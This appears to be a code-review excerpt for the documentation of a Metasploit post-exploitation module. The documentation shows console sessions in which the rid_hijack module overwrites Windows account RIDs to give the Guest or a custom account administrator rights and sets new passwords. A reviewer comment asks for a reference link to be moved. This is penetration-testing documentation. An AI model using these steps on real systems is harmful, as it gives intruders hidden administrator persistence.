documentation/modules/post/windows/manage/rid_hijack.md

```diff
@@ -0,0 +1,146 @@
+[*] Target account username: Invitado
+[*] Target account RID: 501
+[*] Account is disabled, activating...
+[+] Target account enabled
+[*] Overwriting RID
+[+] The RID 500 is set to the account Invitado with original RID 501
+[*] Post module execution completed
+```
+#### Results after login in as the Guest account.
+
+![guest_account](https://user-images.githubusercontent.com/14118912/36490462-4bf84d68-16f6-11e8-811c-bf2d8c42b93d.PNG)
+
+### Assigning Administrator privileges to local custom account.
+```
+msf post(rid_hijack) > set GETSYSTEM true
+GETSYSTEM => true
+msf post(rid_hijack) > set GUEST_ACCOUNT false
+GUEST_ACCOUNT => false
+msf post(rid_hijack) > set USERNAME testuser
+USERNAME => testuser
+msf post(rid_hijack) > run
+
+[*] Checking for SYSTEM privileges on session
+[+] Session is already running with SYSTEM privileges
+[*] Target OS: Windows 8.1 (Build 9600).
+[*] Checking users...
+[+] Found testuser account!
+[*] Target account username: testuser
+[*] Target account RID: 1002
+[+] Target account is already enabled
+[*] Overwriting RID
+[+] The RID 500 is set to the account testuser with original RID 1002
+[*] Post module execution completed
+```
+#### Results after login in as the _testuser_ account.
+![testuser](https://user-images.githubusercontent.com/14118912/36490561-837bd2f0-16f6-11e8-8dc6-53283bb4d9ea.PNG)
+
+### Assigning custom privileges to Guest built-in account and setting new password to Guest.
+```
+msf post(rid_hijack) > set GUEST_ACCOUNT true
+GUEST_ACCOUNT => true
+msf post(rid_hijack) > set RID 1002
+RID => 1002
+msf post(rid_hijack) > set PASSWORD Password.1
+PASSWORD => Password.1
+msf post(rid_hijack) > run
+
+[*] Checking for SYSTEM privileges on session
+[+] Session is already running with SYSTEM privileges
+[*] Target OS: Windows 8.1 (Build 9600).
+[*] Target account: Guest Account
+[*] Target account username: Invitado
+[*] Target account RID: 501
+[+] Target account is already enabled
+[*] Overwriting RID
+[+] The RID 1002 is set to the account Invitado with original RID 501
+[*] Setting Invitado password to Password.1
+[*] Post module execution completed
+```
+### Assigning custom privileges to local custom account and setting new password to custom account.
+```
+msf post(rid_hijack) > set GUEST_ACCOUNT false
+GUEST_ACCOUNT => false
+msf post(rid_hijack) > set USERNAME testuser
+USERNAME => testuser
+msf post(rid_hijack) > set PASSWORD Password.2
+PASSWORD => Password.2
+msf post(rid_hijack) > run
+
+[*] Checking for SYSTEM privileges on session
+[+] Session is already running with SYSTEM privileges
+[*] Target OS: Windows 8.1 (Build 9600).
+[*] Checking users...
+[+] Found testuser account!
+[*] Target account username: testuser
+[*] Target account RID: 1002
+[+] Target account is already enabled
+[*] Overwriting RID
+[+] The RID 1002 is set to the account testuser with original RID 1002
+[*] Setting testuser password to Password.2
+[*] Post module execution completed
+```
+
+## Reference
```

Comment:
Remove this, and put the website up in the overview.  I'd suggest something like:
```For more information see [csl.com.co](http://csl.com.co/rid-hijacking/).```